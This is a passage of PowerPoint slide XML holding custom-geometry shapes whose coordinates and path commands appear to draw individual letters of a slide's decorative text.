                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 11 w 23"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 23 w 23"/>
                    <a:gd name="T3" fmla="*/ 23 h 23"/>
                    <a:gd name="T4" fmla="*/ 20 w 23"/>
                    <a:gd name="T5" fmla="*/ 23 h 23"/>
                    <a:gd name="T6" fmla="*/ 16 w 23"/>
                    <a:gd name="T7" fmla="*/ 16 h 23"/>
                    <a:gd name="T8" fmla="*/ 6 w 23"/>
                    <a:gd name="T9" fmla="*/ 16 h 23"/>
                    <a:gd name="T10" fmla="*/ 3 w 23"/>
                    <a:gd name="T11" fmla="*/ 23 h 23"/>
                    <a:gd name="T12" fmla="*/ 0 w 23"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 11 w 23"/>
                    <a:gd name="T15" fmla="*/ 0 h 23"/>
                    <a:gd name="T16" fmla="*/ 11 w 23"/>
                    <a:gd name="T17" fmla="*/ 0 h 23"/>
                    <a:gd name="T18" fmla="*/ 11 w 23"/>
                    <a:gd name="T19" fmla="*/ 4 h 23"/>
                    <a:gd name="T20" fmla="*/ 7 w 23"/>
                    <a:gd name="T21" fmla="*/ 13 h 23"/>
                    <a:gd name="T22" fmla="*/ 16 w 23"/>
                    <a:gd name="T23" fmla="*/ 13 h 23"/>
                    <a:gd name="T24" fmla="*/ 11 w 23"/>
                    <a:gd name="T25"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11" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="23" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="11" y="4"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="7" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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289"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9502775" y="4427538"/>
                  <a:ext cx="41275" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 26"/>
                    <a:gd name="T1" fmla="*/ 23 h 23"/>
                    <a:gd name="T2" fmla="*/ 4 w 26"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 4 w 26"/>
                    <a:gd name="T5" fmla="*/ 0 h 23"/>
                    <a:gd name="T6" fmla="*/ 13 w 26"/>
                    <a:gd name="T7" fmla="*/ 19 h 23"/>
                    <a:gd name="T8" fmla="*/ 23 w 26"/>
                    <a:gd name="T9" fmla="*/ 0 h 23"/>
                    <a:gd name="T10" fmla="*/ 23 w 26"/>
                    <a:gd name="T11" fmla="*/ 0 h 23"/>
                    <a:gd name="T12" fmla="*/ 26 w 26"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 24 w 26"/>
                    <a:gd name="T15" fmla="*/ 23 h 23"/>
                    <a:gd name="T16" fmla="*/ 21 w 26"/>
                    <a:gd name="T17" fmla="*/ 7 h 23"/>
                    <a:gd name="T18" fmla="*/ 14 w 26"/>
                    <a:gd name="T19" fmla="*/ 23 h 23"/>
                    <a:gd name="T20" fmla="*/ 13 w 26"/>
                    <a:gd name="T21" fmla="*/ 23 h 23"/>
                    <a:gd name="T22" fmla="*/ 5 w 26"/>
                    <a:gd name="T23" fmla="*/ 6 h 23"/>
                    <a:gd name="T24" fmla="*/ 2 w 26"/>
                    <a:gd name="T25" fmla="*/ 23 h 23"/>
                    <a:gd name="T26" fmla="*/ 0 w 26"/>
                    <a:gd name="T2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
                      <a:moveTo>
                        <a:pt x="0" y="23"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="23"/>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290"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9553575" y="4427538"/>
                  <a:ext cx="20638" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 13"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 13 w 13"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 13 w 13"/>
                    <a:gd name="T5" fmla="*/ 3 h 23"/>
                    <a:gd name="T6" fmla="*/ 1 w 13"/>
                    <a:gd name="T7" fmla="*/ 3 h 23"/>
                    <a:gd name="T8" fmla="*/ 1 w 13"/>
                    <a:gd name="T9" fmla="*/ 10 h 23"/>
                    <a:gd name="T10" fmla="*/ 13 w 13"/>
                    <a:gd name="T11" fmla="*/ 10 h 23"/>
                    <a:gd name="T12" fmla="*/ 13 w 13"/>
                    <a:gd name="T13" fmla="*/ 12 h 23"/>
                    <a:gd name="T14" fmla="*/ 1 w 13"/>
                    <a:gd name="T15" fmla="*/ 12 h 23"/>
                    <a:gd name="T16" fmla="*/ 1 w 13"/>
                    <a:gd name="T17" fmla="*/ 21 h 23"/>
                    <a:gd name="T18" fmla="*/ 13 w 13"/>
                    <a:gd name="T19" fmla="*/ 21 h 23"/>
                    <a:gd name="T20" fmla="*/ 13 w 13"/>
                    <a:gd name="T21" fmla="*/ 23 h 23"/>
                    <a:gd name="T22" fmla="*/ 0 w 13"/>
                    <a:gd name="T23" fmla="*/ 23 h 23"/>
                    <a:gd name="T24" fmla="*/ 0 w 13"/>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3">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="13" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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291"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9580563" y="4437063"/>
                  <a:ext cx="4763" cy="26988"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 2"/>
                    <a:gd name="T1" fmla="*/ 0 h 12"/>
                    <a:gd name="T2" fmla="*/ 2 w 2"/>
                    <a:gd name="T3" fmla="*/ 0 h 12"/>
                    <a:gd name="T4" fmla="*/ 2 w 2"/>
                    <a:gd name="T5" fmla="*/ 1 h 12"/>
                    <a:gd name="T6" fmla="*/ 2 w 2"/>
                    <a:gd name="T7" fmla="*/ 2 h 12"/>
                    <a:gd name="T8" fmla="*/ 1 w 2"/>
                    <a:gd name="T9" fmla="*/ 3 h 12"/>
                    <a:gd name="T10" fmla="*/ 0 w 2"/>
                    <a:gd name="T11" fmla="*/ 2 h 12"/>
                    <a:gd name="T12" fmla="*/ 0 w 2"/>
                    <a:gd name="T13" fmla="*/ 1 h 12"/>
                    <a:gd name="T14" fmla="*/ 0 w 2"/>
                    <a:gd name="T15" fmla="*/ 0 h 12"/>
                    <a:gd name="T16" fmla="*/ 1 w 2"/>
                    <a:gd name="T17" fmla="*/ 0 h 12"/>
                    <a:gd name="T18" fmla="*/ 1 w 2"/>
                    <a:gd name="T19" fmla="*/ 10 h 12"/>
                    <a:gd name="T20" fmla="*/ 2 w 2"/>
                    <a:gd name="T21" fmla="*/ 10 h 12"/>
                    <a:gd name="T22" fmla="*/ 2 w 2"/>
                    <a:gd name="T23" fmla="*/ 11 h 12"/>
                    <a:gd name="T24" fmla="*/ 2 w 2"/>
                    <a:gd name="T25" fmla="*/ 12 h 12"/>
                    <a:gd name="T26" fmla="*/ 1 w 2"/>
                    <a:gd name="T27" fmla="*/ 12 h 12"/>
                    <a:gd name="T28" fmla="*/ 0 w 2"/>
                    <a:gd name="T29" fmla="*/ 12 h 12"/>
                    <a:gd name="T30" fmla="*/ 0 w 2"/>
                    <a:gd name="T31" fmla="*/ 11 h 12"/>
                    <a:gd name="T32" fmla="*/ 0 w 2"/>
                    <a:gd name="T33" fmla="*/ 10 h 12"/>
                    <a:gd name="T34" fmla="*/ 1 w 2"/>
                    <a:gd name="T35"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12">
                      <a:moveTo>
                        <a:pt x="1" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="0"/>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="1" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="10"/>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="12"/>
                        <a:pt x="1" y="12"/>
                        <a:pt x="1" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="12"/>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10"/>
                        <a:pt x="1" y="10"/>
                        <a:pt x="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292"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9617075" y="4427538"/>
                  <a:ext cx="23813" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 10"/>
                    <a:gd name="T1" fmla="*/ 13 h 16"/>
                    <a:gd name="T2" fmla="*/ 2 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 16"/>
                    <a:gd name="T4" fmla="*/ 5 w 10"/>
                    <a:gd name="T5" fmla="*/ 15 h 16"/>
                    <a:gd name="T6" fmla="*/ 7 w 10"/>
                    <a:gd name="T7" fmla="*/ 14 h 16"/>
                    <a:gd name="T8" fmla="*/ 8 w 10"/>
                    <a:gd name="T9" fmla="*/ 13 h 16"/>
                    <a:gd name="T10" fmla="*/ 8 w 10"/>
                    <a:gd name="T11" fmla="*/ 12 h 16"/>
                    <a:gd name="T12" fmla="*/ 8 w 10"/>
                    <a:gd name="T13" fmla="*/ 11 h 16"/>
                    <a:gd name="T14" fmla="*/ 5 w 10"/>
                    <a:gd name="T15" fmla="*/ 8 h 16"/>
                    <a:gd name="T16" fmla="*/ 2 w 10"/>
                    <a:gd name="T17" fmla="*/ 6 h 16"/>
                    <a:gd name="T18" fmla="*/ 1 w 10"/>
                    <a:gd name="T19" fmla="*/ 3 h 16"/>
                    <a:gd name="T20" fmla="*/ 2 w 10"/>
                    <a:gd name="T21" fmla="*/ 1 h 16"/>
                    <a:gd name="T22" fmla="*/ 3 w 10"/>
                    <a:gd name="T23" fmla="*/ 0 h 16"/>
                    <a:gd name="T24" fmla="*/ 5 w 10"/>
                    <a:gd name="T25" fmla="*/ 0 h 16"/>
                    <a:gd name="T26" fmla="*/ 7 w 10"/>
                    <a:gd name="T27" fmla="*/ 0 h 16"/>
                    <a:gd name="T28" fmla="*/ 10 w 10"/>
                    <a:gd name="T29" fmla="*/ 2 h 16"/>
                    <a:gd name="T30" fmla="*/ 8 w 10"/>
                    <a:gd name="T31" fmla="*/ 3 h 16"/>
                    <a:gd name="T32" fmla="*/ 7 w 10"/>
                    <a:gd name="T33" fmla="*/ 2 h 16"/>
                    <a:gd name="T34" fmla="*/ 5 w 10"/>
                    <a:gd name="T35" fmla="*/ 1 h 16"/>
                    <a:gd name="T36" fmla="*/ 4 w 10"/>
                    <a:gd name="T37" fmla="*/ 2 h 16"/>
                    <a:gd name="T38" fmla="*/ 3 w 10"/>
                    <a:gd name="T39" fmla="*/ 3 h 16"/>
                    <a:gd name="T40" fmla="*/ 3 w 10"/>
                    <a:gd name="T41" fmla="*/ 4 h 16"/>
                    <a:gd name="T42" fmla="*/ 4 w 10"/>
                    <a:gd name="T43" fmla="*/ 5 h 16"/>
                    <a:gd name="T44" fmla="*/ 6 w 10"/>
                    <a:gd name="T45" fmla="*/ 7 h 16"/>
                    <a:gd name="T46" fmla="*/ 9 w 10"/>
                    <a:gd name="T47" fmla="*/ 10 h 16"/>
                    <a:gd name="T48" fmla="*/ 10 w 10"/>
                    <a:gd name="T49" fmla="*/ 12 h 16"/>
                    <a:gd name="T50" fmla="*/ 9 w 10"/>
                    <a:gd name="T51" fmla="*/ 15 h 16"/>
                    <a:gd name="T52" fmla="*/ 5 w 10"/>
                    <a:gd name="T53" fmla="*/ 16 h 16"/>
                    <a:gd name="T54" fmla="*/ 3 w 10"/>
                    <a:gd name="T55" fmla="*/ 16 h 16"/>
                    <a:gd name="T56" fmla="*/ 0 w 10"/>
                    <a:gd name="T57"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 h="16">
                      <a:moveTo>
                        <a:pt x="0" y="13"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="14"/>
                        <a:pt x="4" y="15"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="14"/>
                        <a:pt x="7" y="14"/>
                        <a:pt x="8" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="13"/>
                        <a:pt x="8" y="13"/>
                        <a:pt x="8" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="8" y="11"/>
                        <a:pt x="8" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="10"/>
                        <a:pt x="6" y="9"/>
                        <a:pt x="5" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="7"/>
                        <a:pt x="3" y="6"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="5"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="1" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="1"/>
                        <a:pt x="10" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="3"/>
                        <a:pt x="8" y="3"/>
                        <a:pt x="8" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="2"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="7" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="1"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="1"/>
                        <a:pt x="4" y="1"/>
                        <a:pt x="4" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="2"/>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="5"/>
                        <a:pt x="4" y="5"/>
                        <a:pt x="4" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="5" y="6"/>
                        <a:pt x="6" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="8"/>
                        <a:pt x="9" y="9"/>
                        <a:pt x="9" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="10"/>
                        <a:pt x="10" y="11"/>
                        <a:pt x="10" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="13"/>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="16"/>
                        <a:pt x="7" y="16"/>
                        <a:pt x="5" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="16"/>
                        <a:pt x="3" y="16"/>
                        <a:pt x="3" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="15"/>
                        <a:pt x="1" y="14"/>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93"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9645650" y="4427538"/>
                  <a:ext cx="42863" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 27"/>
                    <a:gd name="T1" fmla="*/ 23 h 23"/>
                    <a:gd name="T2" fmla="*/ 4 w 27"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 4 w 27"/>
                    <a:gd name="T5" fmla="*/ 0 h 23"/>
                    <a:gd name="T6" fmla="*/ 14 w 27"/>
                    <a:gd name="T7" fmla="*/ 19 h 23"/>
                    <a:gd name="T8" fmla="*/ 23 w 27"/>
                    <a:gd name="T9" fmla="*/ 0 h 23"/>
                    <a:gd name="T10" fmla="*/ 23 w 27"/>
                    <a:gd name="T11" fmla="*/ 0 h 23"/>
                    <a:gd name="T12" fmla="*/ 27 w 27"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 24 w 27"/>
                    <a:gd name="T15" fmla="*/ 23 h 23"/>
                    <a:gd name="T16" fmla="*/ 22 w 27"/>
                    <a:gd name="T17" fmla="*/ 7 h 23"/>
                    <a:gd name="T18" fmla="*/ 14 w 27"/>
                    <a:gd name="T19" fmla="*/ 23 h 23"/>
                    <a:gd name="T20" fmla="*/ 13 w 27"/>
                    <a:gd name="T21" fmla="*/ 23 h 23"/>
                    <a:gd name="T22" fmla="*/ 6 w 27"/>
                    <a:gd name="T23" fmla="*/ 6 h 23"/>
                    <a:gd name="T24" fmla="*/ 3 w 27"/>
                    <a:gd name="T25" fmla="*/ 23 h 23"/>
                    <a:gd name="T26" fmla="*/ 0 w 27"/>
                    <a:gd name="T2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3">
                      <a:moveTo>
                        <a:pt x="0" y="23"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="27" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="23"/>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Rectangle 294"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9693275" y="4427538"/>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295"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9702800" y="4427538"/>
                  <a:ext cx="20638" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 13"/>
                    <a:gd name="T1" fmla="*/ 3 h 23"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 13 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 23"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 3 h 23"/>
                    <a:gd name="T8" fmla="*/ 7 w 13"/>
                    <a:gd name="T9" fmla="*/ 3 h 23"/>
                    <a:gd name="T10" fmla="*/ 7 w 13"/>
                    <a:gd name="T11" fmla="*/ 23 h 23"/>
                    <a:gd name="T12" fmla="*/ 6 w 13"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 6 w 13"/>
                    <a:gd name="T15" fmla="*/ 3 h 23"/>
                    <a:gd name="T16" fmla="*/ 0 w 13"/>
                    <a:gd name="T1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3">
                      <a:moveTo>
                        <a:pt x="0" y="3"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6"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296"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9728200" y="4427538"/>
                  <a:ext cx="28575" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 18"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 3 w 18"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 3 w 18"/>
                    <a:gd name="T5" fmla="*/ 10 h 23"/>
                    <a:gd name="T6" fmla="*/ 15 w 18"/>
                    <a:gd name="T7" fmla="*/ 10 h 23"/>
                    <a:gd name="T8" fmla="*/ 15 w 18"/>
                    <a:gd name="T9" fmla="*/ 0 h 23"/>
                    <a:gd name="T10" fmla="*/ 18 w 18"/>
                    <a:gd name="T11" fmla="*/ 0 h 23"/>
                    <a:gd name="T12" fmla="*/ 18 w 18"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 15 w 18"/>
                    <a:gd name="T15" fmla="*/ 23 h 23"/>
                    <a:gd name="T16" fmla="*/ 15 w 18"/>
                    <a:gd name="T17" fmla="*/ 12 h 23"/>
                    <a:gd name="T18" fmla="*/ 3 w 18"/>
                    <a:gd name="T19" fmla="*/ 12 h 23"/>
                    <a:gd name="T20" fmla="*/ 3 w 18"/>
                    <a:gd name="T21" fmla="*/ 23 h 23"/>
                    <a:gd name="T22" fmla="*/ 0 w 18"/>
                    <a:gd name="T23" fmla="*/ 23 h 23"/>
                    <a:gd name="T24" fmla="*/ 0 w 18"/>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3">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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297"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
